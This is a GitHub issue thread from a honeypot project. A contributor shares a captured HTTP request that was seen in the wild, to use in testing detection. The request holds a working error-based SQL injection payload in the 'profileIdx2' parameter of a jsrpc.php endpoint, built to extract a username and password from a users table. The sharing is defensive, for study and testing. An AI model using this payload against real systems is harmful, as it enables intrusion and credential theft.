tanner icon indicating copy to clipboard operation
tanner copied to clipboard

Published 20 hours ago verified publisher icon mushorg

SQL injections sample

Open glaslos opened this issue 7 years ago • 2 comments 

INFO[0233] [http    ] POST /jsrpc.php HTTP/1.1
Host: 163.172.168.4
content-type: application/x-www-form-urlencoded
connection: keep-alive
accept-encoding: gzip, deflate
accept: */*
user-agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
content-length: 491


action=showlatest&filter=&filter_task=&groupid=&hostid=0&mark_color=1&method=screen.get&mode=2&pageFile=1&profileIdx=1&profileIdx2=%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C%28select+concat%28name%2C0x3a%2Cpasswd%29+from++users+limit+0%2C1%29%2C0x7e%29%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information_schema.tables+group+by+x%29a%29&resourcetype=16&screenid=&type=9&updateProfile=1

glaslos avatar May 24 '17 14:05 glaslos

@glaslos please explain a bit.

rnehra01 avatar Jun 05 '17 02:06 rnehra01

Seen this SQL injection in the wild (profileIdx2= parameter`). Thought it might be useful for testing.

glaslos avatar Jun 06 '17 11:06 glaslos